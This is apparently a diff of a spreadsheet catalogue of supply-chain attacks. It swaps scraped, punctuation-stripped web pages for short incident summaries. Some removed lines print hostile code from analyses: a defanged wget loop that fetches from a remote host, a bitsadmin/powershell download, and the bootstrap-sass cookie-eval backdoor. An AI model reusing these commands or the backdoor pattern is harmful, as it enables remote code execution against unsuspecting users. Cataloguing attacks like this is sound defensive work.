'metadata', 'repository', 'able', 'additional', 'related', 'piece', 'malicious', 'code', 'virustotal', 'hunting', 'capability', 'binary', 'malware', 'family', 'lite', 'functionality', 'command', 'feimea', 'portable', 'main', 'difference', 'feimea', 'portable', 'lite', 'form', 'binary', 'window', 'operating', 'system', 'lame', 'encoder', 'tool', 'thwart', 'detection', 'old', 'sample', 'supremebot2cpl', 'sample', 'command', 'server', 'self', 'certificate', 'similar', 'command', 'portable', 'capability', 'select', 'status', 'list', 'stat', 'search', 'esearch', 'hash', 'fetch', 'copy', 'append', 'link', 'symlink', 'remove', 'access', 'noop', 'logout', 'recent', 'sample', 'aerocpl', 'version', 'string', 'present', 'file', 'lite', 'mainline', 'audio', 'system', 'framework', 'audio', 'command', 'control', 'server', 'sample', 'portable', 'limonsduckdnsorg', 'polarbearfreeddnsorg', 'search', 'exploration', 'graph', 'suspicious', 'account', 'repository', 'network', 'graph', 'entry', 'entry', 'adunkin', 'wayback', 'machine', 'copy', 'repository', 'compilation', 'tool', 'repository', 'several', 'suspicious', 'account', 'account', 'legitimate', 'first', 'sight', 'profile', 'picture', 'description', 'consistent', 'account', 'sample', 'binary', 'i686w64mingw32addr2line', 'b54156221d1c5387b8de0eb4605dc3a0', 'repository', 'wrong', 'binary', 'shellcode', 'identical', 'ffmpeg', 'binary', 'balloryffmpeg', 'repository', 'difference', 'shellcode', 'execute', 'command', 'binsh', 'autostartcd', 'echo', 'desktop', 'execbinsh', 'truedo', 'wget', 'hxxpallesaresourceforgenettestmsg', 'desktop', 'binary', 'repository', 'trail', 'additional', 'account', 'snacknroll11', 'dunkin', 'repository', 'repository', 'interesting', 'name', 'description', 'copy', 'name', 'description', 'binary', 'file', 'repository', 'great', 'closure', 'post', 'file', 'version', 'installer', 'file', '3a75c6b9b8452587b9e809aaaf2ee8c4', 'action', 'script', 'different', 'version', 'bitsadmin', 'powershell', 'download', 'batch', 'script', 'hxxpenlduckdnsorg', 'file', 'brjar', 'file', 'version', 'downloader', 'appendix', 'account', 'repository', 'copy', 'repository', 'content', 'available', 'wayback', 'machine', 'possible', 'link', 'machine', 'copy', 'list', 'account', 'list', 'repository', 'list', 'indicator', 'backdoor', 'malware', 'engineering', 'rabbit', 'hole', 'powershell', 'script', 'comment', 'javascript', 'view', 'comment', 'recent', 'post', 'backdoor', 'factory', 'rabbit', 'hole', 'powershell', 'script', 'network', 'challenge', 'defender', 'part', 'time', 'story', 'status', 'tweet', 'octopress', 'theme', 'solution']</t>
         </is>
       </c>
     </row>
@@ -2970,7 +2589,11 @@
           <t>Visual Studio</t>
         </is>
       </c>
-      <c r="C98" t="inlineStr"/>
+      <c r="C98" t="inlineStr">
+        <is>
+          <t>Malware was seamlessly integrated into the code of recently compiled legitimate applications, likely through a trojanized Visual Studio development environment used by software coders in the organization.  Several gaming companies, an IT services company, a conglomerate holding company and a pharmaceutical company were compromised in this attack.</t>
+        </is>
+      </c>
       <c r="D98" t="inlineStr">
         <is>
           <t>https://usa.kaspersky.com/blog/details-shadow-hammer/17576/
@@ -2978,11 +2601,6 @@
 https://www.welivesecurity.com/2019/03/11/gaming-industry-scope-attackers-asia/</t>
         </is>
       </c>
-      <c r="E98" t="inlineStr">
-        <is>
-          <t>[]</t>
-        </is>
-      </c>
     </row>
     <row r="99">
       <c r="A99" t="inlineStr">
@@ -2995,15 +2613,14 @@
           <t>Google Play Store</t>
         </is>
       </c>
-      <c r="C99" t="inlineStr"/>
+      <c r="C99" t="inlineStr">
+        <is>
+          <t>This particular strain of Adware was found in 206 applications, and the combined download count has reached almost 150 million. Google was swiftly notified and removed the infected applications from the Google Play Store.  The malware resides within the RXDroider Software Development Kit (SDK), which is provided by addroider[.]com as an ad-related SDK. The researchers believe the developers were scammed to use this malicious SDK, unaware of its content, leading to the fact that this campaign was not targeting a specific county or developed by the same developer. The malware has been dubbed SimBad due to the fact that a large portion of the infected applications are simulator games.</t>
+        </is>
+      </c>
       <c r="D99" t="inlineStr">
         <is>
           <t>https://research.checkpoint.com/2019/simbad-a-rogue-adware-campaign-on-google-play/</t>
-        </is>
-      </c>
-      <c r="E99" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3018,15 +2635,14 @@
           <t>Android Apps</t>
         </is>
       </c>
-      <c r="C100" t="inlineStr"/>
+      <c r="C100" t="inlineStr">
+        <is>
+          <t>Check Point Research has recently discovered a group of Android applications massively harvesting contact information on mobile phones without user consent. The data stealing logic hides inside a data analytics Software Development Kit (SDK) seen in up to 12 different mobile applications and has so far been downloaded over 111 million times.</t>
+        </is>
+      </c>
       <c r="D100" t="inlineStr">
         <is>
           <t>https://research.checkpoint.com/2019/operation-sheep-pilfer-analytics-sdk-in-action/</t>
-        </is>
-      </c>
-      <c r="E100" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3043,7 +2659,7 @@
       </c>
       <c r="C101" t="inlineStr">
         <is>
-          <t>solutions home products small business employees medium business employees enterprise employees kaspersky companyaccount touch dark mode english russian spanish solutions hybrid cloud learn internet things embedded learn management defense learn industrial cybersecurity learn fraud prevention learn solutions blockchain kaspersky operations center industries national cybersecurity learn industrial cybersecurity learn finance services cybersecurity learn healthcare cybersecurity learn transportation cybersecurity learn retail cybersecurity learn industries telecom cybersecurity blockchain view products kaspersky endpoint business learn kaspersky endpoint detection response learn kaspersky optimum learn kaspersky anti targeted attack platform learn kaspersky managed detection response learn kaspersky sandbox learn products kaspersky mail server kaspersky internet gateway kaspersky embedded systems kaspersky hybrid cloud kaspersky hybrid cloud azure view services kaspersky cybersecurity services learn kaspersky adaptive online training learn kaspersky premium support learn kaspersky intelligence learn kaspersky intelligence reporting learn kaspersky targeted attack discovery learn services kaspersky professional services kaspersky incident response kaspersky cybersecurity training kaspersky incident communications kaspersky awareness view resource center case studies white papers datasheets technologies mitre attck transparency corporate news press center careers innovation sponsorship policy blog contacts gdpr subscribe dark mode login securelist menu english russian spanish existing customers personal kaspersky renew product update product customer support business ksos portal kaspersky business technical support knowledge base renew license home products trialsupdate resource center business small business employees medium business employees enterprise employees securelist threats financial threats mobile threats threats secure environment vulnerabilities exploits spam phishing industrial threats categories reports incidents research malware reports spam phishing reports publications kaspersky bulletin archive tags logbook webinars statistics encyclopedia threats descriptions company transparency corporate news press center careers sponsorships policy blog contacts partners find partner partner program content menu close subscribe kaspersky dark mode threats threats targeted attacks secure environment mobile threats financial threats spam phishing industrial threats threats vulnerabilities exploits categories categories reports malware descriptions bulletin malware reports spam phishing reports technologies research publications sections archive tags webinars logbook statistics encyclopedia threats descriptions sorry page requested cannot found searching something else take look latest reports sorry page requested cannot found searching something else take look latest reports reports hrserv previously unknown shell used attack report kaspersky researchers provide analysis previously unknown hrserv shell exhibits crimeware features likely active since modern asian groups’ tactics techniques procedures ttps asian groups target various organizations multitude regions industries created report provide cybersecurity community bestprepared intelligence data effectively counteract asian groups cascade compromise unveiling lazarus’ campaign unveil lazarus campaign exploiting company products examine intricate connections campaigns catch wild triangle kaspersky researchers obtained stages operation triangulation campaign targeting iphones ipads including zeroday exploits validators triangledb implant additional modules latest posts malware reports android malware android malware android malware great posts patched windows attack surface still exploitable elsayed elrefaei ashraf refaat kaspersky gert malware descriptions what’s notepad infected text editors target chinese users sergey puzan spam phishing reports spam phishing tatyana kulikova olga svistunova andrey kovtun irina shimko roman dedenok subscribe weekly emails hottest research right inbox email agree provide email address kaspersky lab” receive information posts site understand withdraw consent time email clicking “unsubscribe” link find bottom email sent purposes mentioned subscribe threats threats targeted attacks secure environment mobile threats financial threats spam phishing industrial threats threats vulnerabilities exploits categories categories reports malware descriptions bulletin malware reports spam phishing reports technologies research publications sections archive tags webinars logbook statistics encyclopedia threats descriptions kaspersky rights reserved registered trademarks service marks property respective owners privacy policy license agreement cookies subscribe weekly emails hottest research right inbox email agree provide email address kaspersky lab” receive information posts site understand withdraw consent time email clicking “unsubscribe” link find bottom email sent purposes mentioned subscribe</t>
+          <t>The ASUS software update tool was distributed with malware from the company's offical release servers. ASUS distributes malicious updates to 500k customers: ShadowHammer</t>
         </is>
       </c>
       <c r="D101" t="inlineStr">
@@ -3052,11 +2668,6 @@
 https://www.vice.com/en_us/article/pan9wn/hackers-hijacked-asus-software-updates-to-install-backdoors-on-thousands-of-computers</t>
         </is>
       </c>
-      <c r="E101" t="inlineStr">
-        <is>
-          <t>['solution', 'home', 'product', 'small', 'business', 'employee', 'medium', 'business', 'employee', 'enterprise', 'employee', 'dark', 'mode', 'solution', 'hybrid', 'cloud', 'internet', 'thing', 'management', 'defense', 'industrial', 'cybersecurity', 'fraud', 'prevention', 'solution', 'blockchain', 'kaspersky', 'operation', 'center', 'industry', 'national', 'cybersecurity', 'industrial', 'cybersecurity', 'finance', 'service', 'cybersecurity', 'healthcare', 'cybersecurity', 'transportation', 'cybersecurity', 'retail', 'cybersecurity', 'industry', 'telecom', 'cybersecurity', 'blockchain', 'view', 'product', 'kaspersky', 'endpoint', 'business', 'kaspersky', 'endpoint', 'detection', 'response', 'optimum', 'anti', 'attack', 'platform', 'kaspersky', 'detection', 'response', 'product', 'kaspersky', 'mail', 'server', 'internet', 'gateway', 'kaspersky', 'system', 'cloud', 'azure', 'view', 'service', 'kaspersky', 'cybersecurity', 'service', 'online', 'training', 'premium', 'support', 'kaspersky', 'intelligence', 'intelligence', 'reporting', 'attack', 'service', 'service', 'response', 'cybersecurity', 'training', 'incident', 'communication', 'kaspersky', 'awareness', 'view', 'resource', 'center', 'case', 'white', 'paper', 'datasheet', 'technology', 'mitre', 'attck', 'transparency', 'corporate', 'news', 'press', 'center', 'career', 'innovation', 'sponsorship', 'policy', 'blog', 'contact', 'dark', 'mode', 'login', 'securelist', 'spanish', 'customer', 'personal', 'kaspersky', 'product', 'update', 'product', 'customer', 'support', 'business', 'technical', 'support', 'knowledge', 'base', 'license', 'home', 'product', 'resource', 'center', 'business', 'small', 'business', 'employee', 'medium', 'business', 'employee', 'enterprise', 'employee', 'securelist', 'threat', 'financial', 'threat', 'mobile', 'threat', 'threat', 'secure', 'environment', 'vulnerability', 'spam', 'industrial', 'threat', 'category', 'report', 'incident', 'phishing', 'report', 'kaspersky', 'bulletin', 'archive', 'tag', 'logbook', 'webinar', 'statistic', 'encyclopedia', 'threat', 'description', 'company', 'transparency', 'corporate', 'news', 'press', 'center', 'career', 'sponsorship', 'policy', 'blog', 'contact', 'partner', 'partner', 'partner', 'program', 'content', 'menu', 'close', 'subscribe', 'mode', 'threat', 'threat', 'attack', 'environment', 'mobile', 'threat', 'financial', 'threat', 'spam', 'industrial', 'threat', 'threat', 'vulnerability', 'category', 'category', 'malware', 'description', 'bulletin', 'phishing', 'report', 'research', 'publication', 'archive', 'tag', 'webinar', 'logbook', 'statistic', 'encyclopedia', 'threat', 'description', 'sorry', 'page', 'late', 'report', 'sorry', 'page', 'late', 'report', 'unknown', 'shell', 'attack', 'report', 'kaspersky', 'researcher', 'analysis', 'unknown', 'feature', 'active', 'modern', 'asian', 'group', 'tactic', 'technique', 'procedure', 'asian', 'group', 'various', 'organization', 'multitude', 'region', 'industry', 'report', 'cybersecurity', 'community', 'bestprepared', 'intelligence', 'datum', 'asian', 'group', 'compromise', 'campaign', 'campaign', 'company', 'product', 'intricate', 'connection', 'campaign', 'wild', 'triangle', 'kaspersky', 'researcher', 'stage', 'operation', 'triangulation', 'campaign', 'iphone', 'ipad', 'zeroday', 'validator', 'implant', 'additional', 'module', 'late', 'post', 'post', 'attack', 'surface', 'exploitable', 'kaspersky', 'gert', 'malware', 'description', 'notepad', 'text', 'editor', 'chinese', 'user', 'spam', 'phishing', 'report', 'spam', 'weekly', 'email', 'hot', 'research', 'right', 'inbox', 'email', 'email', 'address', 'lab', 'information', 'post', 'site', 'consent', 'time', 'email', 'unsubscribe', 'link', 'bottom', 'email', 'purpose', 'subscribe', 'threat', 'threat', 'attack', 'environment', 'mobile', 'threat', 'financial', 'threat', 'spam', 'industrial', 'threat', 'threat', 'vulnerability', 'category', 'category', 'malware', 'description', 'bulletin', 'phishing', 'report', 'research', 'publication', 'archive', 'tag', 'webinar', 'logbook', 'statistic', 'encyclopedia', 'threat', 'description', 'kaspersky', 'right', 'trademark', 'service', 'property', 'respective', 'owner', 'privacy', 'policy', 'license', 'agreement', 'cookie', 'weekly', 'email', 'hot', 'research', 'right', 'inbox', 'email', 'email', 'address', 'lab', 'information', 'post', 'site', 'consent', 'time', 'email', 'unsubscribe', 'link', 'bottom', 'email', 'purpose', 'subscribe']</t>
-        </is>
-      </c>
     </row>
     <row r="102">
       <c r="A102" t="inlineStr">
@@ -3069,15 +2680,14 @@
           <t>Google Play Store</t>
         </is>
       </c>
-      <c r="C102" t="inlineStr"/>
+      <c r="C102" t="inlineStr">
+        <is>
+          <t>Exodus is an Android spyware platform available on the Google Play Store, disguised as service applications from mobile operators.</t>
+        </is>
+      </c>
       <c r="D102" t="inlineStr">
         <is>
           <t>https://securitywithoutborders.org/blog/2019/03/29/exodus.html</t>
-        </is>
-      </c>
-      <c r="E102" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3094,17 +2704,12 @@
       </c>
       <c r="C103" t="inlineStr">
         <is>
-          <t>need enable javascript products products snyk code sast secure code written snyk open source avoid vulnerable dependencies snyk container keep base images secure snyk infrastructure code misconfigurations cloud snyk apprisk aspm reduce risk across business solutions application build secure stay secure software supply chain mitigate supply chain risk secure aigenerated code writes snyk secures zeroday vulnerabilities first snyk platform snyk developerfirst action developer platform modern single platform intelligence comprehensive vulnerability data license compliance management manage open source usage snyk learn selfservice education deepcode purposebuilt integrations snyk tools flows resources using snyk documentation vulnerability intelligence product training support services customer resources learn connect blog community events webinars devsecops developer resources company snyk customers partners newsroom contact careers pricing english deutsch français português sign book live demo snyk blog malicious remote code execution backdoor discovered popular bootstrapsass ruby written liran april mins read march malicious version popular bootstrapsass package downloaded total million times date published official rubygems repository version includes stealthy backdoor gives attackers remote command execution serverside rails applications already added vulnerability database project monitored snyk already notified routine alerts application contains malicious package test free application affected malicious version testing application code repository snyk find rails application making vulnerable project take immediate action replace vulnerable version republished first response mitigation without requiring major version upgrades derek barnes opened github issue twbsbootstrapsass repository raised issue related malicious version pointed suspicious snippet code bundled version bootstrapsass backdoor wisely hidden version published rubygems source malicious version existed github repository allowed remote attackers dynamically execute code servers hosting vulnerable versions bootstrapsass package popular malicious backdoor potentially affects large users package’s github repository starred times features million downloads total current version downloads quick analysis shows roughly github repositories exposed malicious library direct number increase significantly counting usage applications transitive dependency recap attack timeline version removed rubygems registry means tarball still accessible directly rubygems repository however visible package manager tell version malicious yanked malicious actors order users upgrade published next march 26th version published malicious actors version includes hides backdoor file libactivecontrollermiddlewarerb backdoor taps another ruby module modifies specific cookies sent client base64 decoded evaluated runtime effectively allow remote code execution malicious version matches sha256 checksum 366d6162fe36fc81dadc114558b43c6c8890c8bcc7e90e2949ae6344d0785dc0 assume attacker obtained credentials publish malicious rubygems package maintainers officially confirmed march 26th 1059pm derek barnes opened issue public repository inform maintainers wider community suspicion regarding code found version march 26th 1156pm hour later malicious version removed rubygems repository maintainers confirmed updated credentials version removed users needed upgrade alternate versions recommended project maintainers today april 410pm project maintainers released version identical retracted version allow users easily upgrade safe version without needing resort major version change april 446pm update vulnerable version removed incorrectly remained rubygems registry mirrors several days reported entirely unavailable unraveling vulnerability gain insight malicious backdoor need understand bootstrapsass package fits development practices ruby application bootstrapsass official project spawned twitter bootstrap parent project provides sasspowered version bootstrap sass tool empowers frontend engineers provides higher level abstraction writing files capabilities mixins variables conditional statements sass tooling mostly related frontend assets would normally leveraged part frontend build phase creates static assets served static servers however ruby railspowered applications serve backend frontend code bootstrapsass project provides ruby bindings used framework rails application wants make bootstrapsass library declares dependency updates relevant imports order include bootstrapsass compile files runtime bootstrapsass imported imports following malicious middleware code resides libactivecontrollermiddlewarerb begin require racksendfile railsenvproduction racksendfiletap rsend aliasmethod call rsenddefinemethod call begin base64urlsafedecode64e httpcookie upcasescan cfduid flatten eval rescue exception rescue exception backdoor nutshell import racksendfile rails application running production environment modify call method monkeypatching call method updates original read http cookie named cfduid sent clientside base64 decodes evaluates dynamic code runtime executing dynamic code calls original call method project monitored snyk already notified snyk’s routine alerts application contain malicious package however monitoring projects snyk oneoff test open source project clicking test repositories using test projects locally affected next found rails application making vulnerable project take immediate steps replace current vulnerable version republished version first response mitigation without requiring major version upgrades encourage connect repositories snyk monitor malicious activity future well surface vulnerabilities exist application live hack exploiting aigenerated code gain insights best practices utilizing generative coding tools securely upcoming live hacking session register posted vulnerability insights open source application guide choosing sast solution process assessing selecting implementing modern sast solution based four phase process find best specific needs guide snyk developer platform integrating directly development tools workflows automation pipelines snyk makes easy teams find prioritize vulnerabilities code dependencies containers infrastructure code supported industryleading application intelligence snyk puts expertise developer’s toolkit start free book live demo product snyk snyk code sast snyk open source snyk container snyk infrastructure code snyk apprisk aspm developer platform application software supply chain secure aigenerated code deepcode pricing deployment options integrations plugins cicd pipelines snyk snyk learn snyk javascript resources documentation snyk docs status disclosed vulnerabilities support portal faq’s blog fundamentals resources leaders resources ethical hackers vulnerability database snyk advisor snyk videos customer resources company customers careers events snyk government press trust legal terms privacy california residents sell personal information website terms connect book live demo contact support report vuln application container supply chain javascript open source secure sdlc posture secure coding ethical hacking cybersecurity code checker python enterprise cybersecurity javascript snyk github snyk veracode snyk limited registered england wales</t>
+          <t>A malicious version of the popular bootstrap-sass package  was published to the official RubyGems repository.</t>
         </is>
       </c>
       <c r="D103" t="inlineStr">
         <is>
           <t>https://snyk.io/blog/malicious-remote-code-execution-backdoor-discovered-in-the-popular-bootstrap-sass-ruby-gem/</t>
-        </is>
-      </c>
-      <c r="E103" t="inlineStr">
-        <is>
-          <t>['javascript', 'product', 'product', 'snyk', 'code', 'sast', 'secure', 'code', 'snyk', 'open', 'source', 'vulnerable', 'dependency', 'snyk', 'container', 'base', 'image', 'secure', 'snyk', 'infrastructure', 'code', 'misconfiguration', 'risk', 'business', 'solution', 'application', 'secure', 'secure', 'software', 'supply', 'chain', 'supply', 'chain', 'risk', 'secure', 'code', 'snyk', 'zeroday', 'first', 'snyk', 'platform', 'action', 'developer', 'platform', 'modern', 'single', 'platform', 'intelligence', 'comprehensive', 'vulnerability', 'license', 'compliance', 'management', 'open', 'source', 'usage', 'snyk', 'selfservice', 'education', 'purposebuilt', 'integration', 'snyk', 'tool', 'resource', 'snyk', 'documentation', 'vulnerability', 'intelligence', 'product', 'training', 'support', 'service', 'customer', 'resource', 'blog', 'community', 'event', 'webinar', 'developer', 'resource', 'company', 'snyk', 'customer', 'partner', 'newsroom', 'contact', 'career', 'book', 'live', 'demo', 'snyk', 'malicious', 'remote', 'code', 'execution', 'backdoor', 'popular', 'bootstrapsass', 'ruby', 'liran', 'min', 'malicious', 'version', 'popular', 'bootstrapsass', 'package', 'total', 'time', 'date', 'official', 'rubygem', 'repository', 'version', 'stealthy', 'backdoor', 'attacker', 'remote', 'command', 'execution', 'serverside', 'rail', 'application', 'vulnerability', 'database', 'project', 'snyk', 'routine', 'alert', 'application', 'malicious', 'package', 'test', 'free', 'application', 'malicious', 'version', 'testing', 'application', 'code', 'repository', 'snyk', 'rail', 'application', 'vulnerable', 'project', 'immediate', 'action', 'vulnerable', 'version', 'first', 'response', 'mitigation', 'major', 'version', 'upgrade', 'barne', 'issue', 'malicious', 'version', 'suspicious', 'snippet', 'code', 'version', 'bootstrapsass', 'backdoor', 'version', 'rubygem', 'source', 'malicious', 'version', 'remote', 'attacker', 'code', 'server', 'vulnerable', 'version', 'bootstrapsass', 'package', 'popular', 'malicious', 'backdoor', 'large', 'user', 'package', 'time', 'download', 'total', 'current', 'version', 'quick', 'analysis', 'repository', 'malicious', 'library', 'direct', 'number', 'increase', 'usage', 'application', 'transitive', 'dependency', 'recap', 'attack', 'timeline', 'version', 'rubygem', 'registry', 'tarball', 'accessible', 'repository', 'visible', 'package', 'manager', 'version', 'malicious', 'malicious', 'actor', 'user', 'next', '26th', 'version', 'malicious', 'actor', 'version', 'backdoor', 'file', 'libactivecontrollermiddlewarerb', 'backdoor', 'ruby', 'module', 'specific', 'cookie', 'client', 'base64', 'runtime', 'remote', 'code', 'execution', 'malicious', 'version', 'match', 'checksum', 'assume', 'attacker', 'credential', 'malicious', 'rubygem', 'package', '26th', 'barne', 'issue', 'public', 'repository', 'wide', 'community', 'suspicion', 'code', 'version', '26th', '1156pm', 'hour', 'malicious', 'version', 'rubygem', 'repository', 'credential', 'version', 'user', 'alternate', 'version', 'project', 'today', '410pm', 'project', 'version', 'identical', 'version', 'user', 'safe', 'version', 'resort', 'major', 'version', 'change', 'vulnerable', 'version', 'rubygem', 'registry', 'mirror', 'several', 'day', 'unavailable', 'vulnerability', 'insight', 'malicious', 'backdoor', 'bootstrapsass', 'package', 'development', 'practice', 'ruby', 'application', 'official', 'project', 'twitter', 'bootstrap', 'parent', 'project', 'version', 'bootstrap', 'sass', 'tool', 'empower', 'engineer', 'high', 'level', 'abstraction', 'file', 'capability', 'mixin', 'variable', 'conditional', 'statement', 'tooling', 'related', 'frontend', 'asset', 'part', 'build', 'phase', 'static', 'asset', 'static', 'server', 'ruby', 'application', 'backend', 'frontend', 'code', 'bootstrapsass', 'project', 'ruby', 'binding', 'framework', 'rail', 'application', 'library', 'dependency', 'update', 'relevant', 'import', 'order', 'bootstrapsass', 'compile', 'file', 'runtime', 'bootstrapsass', 'import', 'malicious', 'middleware', 'code', 'racksendfile', 'railsenvproduction', 'call', 'rsenddefinemethod', 'call', 'upcasescan', 'cfduid', 'flatten', 'rescue', 'exception', 'rescue', 'exception', 'backdoor', 'nutshell', 'import', 'racksendfile', 'rail', 'application', 'production', 'environment', 'call', 'method', 'call', 'method', 'original', 'read', 'http', 'cookie', 'cfduid', 'clientside', 'base64', 'decode', 'dynamic', 'code', 'runtime', 'dynamic', 'code', 'original', 'call', 'method', 'project', 'snyk', 'snyk', 'routine', 'alert', 'application', 'malicious', 'package', 'project', 'snyk', 'test', 'open', 'source', 'project', 'clicking', 'test', 'repository', 'test', 'project', 'rail', 'application', 'vulnerable', 'project', 'immediate', 'step', 'current', 'vulnerable', 'version', 'version', 'first', 'response', 'mitigation', 'major', 'version', 'upgrade', 'connect', 'repository', 'snyk', 'malicious', 'activity', 'future', 'surface', 'vulnerability', 'application', 'live', 'hack', 'code', 'insight', 'good', 'practice', 'generative', 'tool', 'upcoming', 'live', 'hacking', 'session', 'vulnerability', 'insight', 'open', 'source', 'application', 'guide', 'sast', 'solution', 'process', 'modern', 'sast', 'solution', 'phase', 'process', 'good', 'specific', 'need', 'guide', 'snyk', 'developer', 'platform', 'development', 'tool', 'automation', 'pipeline', 'snyk', 'easy', 'team', 'prioritize', 'vulnerability', 'code', 'dependency', 'container', 'application', 'intelligence', 'snyk', 'expertise', 'developer', 'toolkit', 'free', 'book', 'live', 'demo', 'product', 'snyk', 'snyk', 'code', 'sast', 'snyk', 'open', 'source', 'snyk', 'container', 'developer', 'platform', 'application', 'software', 'supply', 'chain', 'code', 'pricing', 'deployment', 'option', 'integration', 'pipeline', 'snyk', 'snyk', 'javascript', 'resource', 'documentation', 'snyk', 'status', 'vulnerability', 'blog', 'resource', 'leader', 'ethical', 'hacker', 'vulnerability', 'advisor', 'customer', 'resource', 'company', 'customer', 'career', 'event', 'snyk', 'government', 'press', 'trust', 'legal', 'term', 'resident', 'personal', 'information', 'website', 'term', 'book', 'live', 'demo', 'contact', 'support', 'report', 'application', 'container', 'supply', 'chain', 'javascript', 'open', 'source', 'secure', 'sdlc', 'posture', 'secure', 'ethical', 'hacking', 'cybersecurity', 'code', 'python', 'enterprise', 'cybersecurity']</t>
         </is>
       </c>
     </row>
@@ -3119,15 +2724,14 @@
           <t>PrismWeb JavaScript</t>
         </is>
       </c>
-      <c r="C104" t="inlineStr"/>
+      <c r="C104" t="inlineStr">
+        <is>
+          <t>PrismWeb-powered online stores Infected with Card Stealing malware</t>
+        </is>
+      </c>
       <c r="D104" t="inlineStr">
         <is>
           <t>https://www.bleepingcomputer.com/news/security/over-200-college-campus-stores-infected-with-card-stealing-scripts</t>
-        </is>
-      </c>
-      <c r="E104" t="inlineStr">
-        <is>
-          <t>[]</t>
         </is>
       </c>
     </row>
@@ -3144,7 +2748,7 @@
       </c>
       <c r="C105" t="inlineStr">
         <is>
-          <t>skip main content open menu open navigation reddit home rpython chip close button reddit reddit expand user menu open settings menu sign advertise reddit shop collectible avatars reddit scan code download check stores page found</t>
+          <t>Versions 0.28 - 0.31 of the ssh-decorate PyPI package would capture and exfiltrate SSH credentials.</t>
         </is>
       </c>
       <c r="D105" t="inlineStr">
@@ -3153,11 +2757,6 @@
 https://www.bleepingcomputer.com/news/security/backdoored-python-library-caught-stealing-ssh-credentials/</t>
         </is>
       </c>
-      <c r="E105" t="inlineStr">
-        <is>
-          <t>['main', 'content', 'open', 'menu', 'open', 'navigation', 'chip', 'close', 'button', 'reddit', 'reddit', 'user', 'menu', 'open', 'setting', 'menu', 'sign', 'reddit', 'shop', 'collectible', 'avatar', 'download', 'store', 'page']</t>
-        </is>
-      </c>
     </row>
     <row r="106">
       <c r="A106" t="inlineStr">
@@ -3172,17 +2771,12 @@
       </c>
       <c r="C106" t="inlineStr">
         <is>
-          <t>browser longer supported please switch supported browser continue using twittercom list supported browsers help center help center terms service privacy policy cookie policy imprint info corp</t>
+          <t>The security seal as sold by @bestoftheweb contains even 2 different keystroke loggers.</t>
         </is>
       </c>
       <c r="D106" t="inlineStr">
         <is>
           <t>https://twitter.com/gwillem/status/1127890329175244800</t>
-        </is>
-      </c>
-      <c r="E106" t="inlineStr">
-        <is>
-          <t>['browser', 'list', 'browser', 'center', 'center', 'term', 'service', 'privacy', 'policy', 'cookie', 'policy', 'imprint']</t>
         </is>
       </c>
     </row>
@@ -3199,17 +2793,12 @@
       </c>
       <c r="C107" t="inlineStr">
         <is>
-          <t>blog archive npmjscom status support blog discontinued updates team published github blog github changelog plot steal cryptocurrency foiled team yesterday team collaboration komodo helped protect million cryptocurrency assets found responded malware targeting users cryptocurrency wallet called agama attack focused getting malicious package build chain agama stealing wallet seeds login passphrases used within application details attack carried using pattern becoming popular publishing “useful” package electronnativenotify waiting target updating include malicious payload github user sawlysawly published commit added electronnativenotify dependency easydexgui application used part agama wallet next version electronnativenotify published days later first version include malicious payload following agama version v035 released electron native notify publication timeline 20190306t235433625z 20190307t030745585z 20190307t031000491z 20190308t034617223z 20190308t040455489z 20190308t041813915z 20190308t042926857z 20190308t044444991z 20190308t044723483z 20190308t095807558z komodoplatformeasydexgui installs package 20190323t092857679z malicious payload introduced 20190323t104536035z 20190416t020956904z agama updated sawlysawly version 20190511t114421933z 20190603t152640054z notified internal tooling responded notifying coordinating komodo protect users well remove malware brief demonstration showing agama wallet sending wallet seed remote server launching wallet application left request updatecheckherokuapp… right downloads second stage payload enter wallet seed another request remote server successfully stealing wallet seed komodo platform released following statement httpskomodoplatformcomvulnerabilitydiscoveredinkomodosagamawalletthisiswhatyouneedtodo provides guidance user agama wallet users automatically notified audit encounter malicious dependency projects continues grow team invest infrastructure bring levels protection users june 743pm adamnpm cryptocurrency komodo malware agama wallet</t>
+          <t>Malicious npm dependency  electron-native-notify added to EasyDEX-GUI application used by the Agama cryptowallet app</t>
         </is>
       </c>
       <c r="D107" t="inlineStr">
         <is>
           <t>https://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm</t>
-        </is>
-      </c>
-      <c r="E107" t="inlineStr">
-        <is>
-          <t>['blog', 'archive', 'status', 'support', 'blog', 'update', 'team', 'steal', 'cryptocurrency', 'team', 'yesterday', 'team', 'collaboration', 'komodo', 'cryptocurrency', 'asset', 'responded', 'malware', 'user', 'cryptocurrency', 'wallet', 'attack', 'malicious', 'package', 'build', 'wallet', 'seed', 'login', 'passphrase', 'application', 'detail', 'attack', 'pattern', 'popular', 'publishing', 'useful', 'package', 'electronnativenotify', 'target', 'updating', 'malicious', 'payload', 'user', 'electronnativenotify', 'dependency', 'easydexgui', 'application', 'wallet', 'next', 'version', 'electronnativenotify', 'day', 'first', 'version', 'malicious', 'payload', 'version', 'electron', 'publication', 'timeline', 'komodoplatformeasydexgui', 'package', 'malicious', 'payload', 'internal', 'tooling', 'komodo', 'user', 'malware', 'brief', 'demonstration', 'wallet', 'wallet', 'seed', 'remote', 'server', 'wallet', 'application', 'request', 'right', 'second', 'stage', 'payload', 'wallet', 'seed', 'request', 'remote', 'server', 'wallet', 'seed', 'komodo', 'platform', 'statement', 'httpskomodoplatformcomvulnerabilitydiscoveredinkomodosagamawalletthisiswhatyouneedtodo', 'guidance', 'user', 'wallet', 'user', 'audit', 'malicious', 'dependency', 'project', 'team', 'infrastructure', 'level', 'protection', 'user', 'wallet']</t>
         </is>
       </c>
     </row>
@@ -3226,17 +2815,12 @@
       </c>
       <c r="C108" t="inlineStr">
         <is>
-          <t>skip content toggle navigation sign product actions automate workflow packages host manage packages find vulnerabilities codespaces instant environments copilot write better code code review manage code changes issues plan track work discussions collaborate outside code explore features documentation github skills blog solutions enterprise teams startups education solution cicd automation devops devsecops resources learning pathways white papers ebooks webinars customer stories partners open source github sponsors fund open source developers readme project github community articles repositories topics trending collections pricing search jump search code repositories users issues pull requests search clear search syntax tips provide feedback read every piece feedback take input seriously include email address contacted cancel submit feedback saved searches saved searches filter results quickly name query available qualifiers documentation cancel create saved search sign sign signed another window reload refresh session signed another window reload refresh session switched accounts another window reload refresh session dismiss alert rubygems rubygemsorg public notifications fork star code issues pull requests discussions actions wiki insights additional navigation options code issues pull requests discussions actions wiki insights issue question project sign free github account open issue contact maintainers community pick username email address password sign github clicking “sign github” agree terms service 